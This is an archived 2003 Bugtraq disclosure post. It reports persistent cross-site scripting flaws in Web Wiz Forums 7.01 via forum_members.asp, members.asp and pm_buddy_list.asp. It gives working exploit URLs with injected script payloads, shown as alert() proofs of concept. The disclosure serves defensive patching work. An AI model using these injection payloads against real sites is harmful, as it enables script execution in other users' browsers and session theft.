lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <18150849207.20031022004135@hex.net.ru>
Date: Wed, 22 Oct 2003 00:41:35 +0400
From: HEX <hex@....net.ru>
To: bugtraq@...urityfocus.com, info@...wizguide.info
Subject: Web Wiz Forums ver. 7.01


Informations :
°°°°°°°°°°°°
Language : ASP
Bugged Version : Web Wiz Forums ver. 7.01 (and less ?)
Patched version : none
Website : http://www.webwizforums.com
Problems : Permanent XSS

Objects :
°°°°°°°
- forum_members.asp
- members.asp

- pm_buddy_list.asp

Exploits :
°°°°°°°°
http://[TARGET]/forum_members.asp?find=%22;}[CODE];function%20x(){v%20=%22

Example: http://[TARGET]/forum_members.asp?find=%22;}ALERT('XSS atack by [HEX] (c) [CSL]');function%20x(){v%20=%22

http://[TARGET]/members.asp?SF=%22;}[CODE]function%20x(){v%20=%22

Example: http://[TARGET]/members.asp?SF=%22;}ALERT('XSS atack by [HEX] (c) [CSL]');function%20x(){v%20=%22

http://[TARGET]/pm_buddy_list.asp?name=A&desc=B%22%3E[CODE]%3Ca%20s=%22&code=1

Example: http://[TARGET]/pm_buddy_list.asp?name=A&desc=B%22%3E<SCRIPT>ALERT('XSS atack by [HEX] (c) [CSL]');</SCRIPT>%3Ca%20s=%22&code=1

Patch/More Details :
°°°°°°°°°°°°°°°°°°
Waiting for the patch at http://www.webwizforums.com...


[ Local time 2:30    | Если б мишки были пчелами... ]
[ Copyright by [HEX] | mailto:hex@....net.ru ]




Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ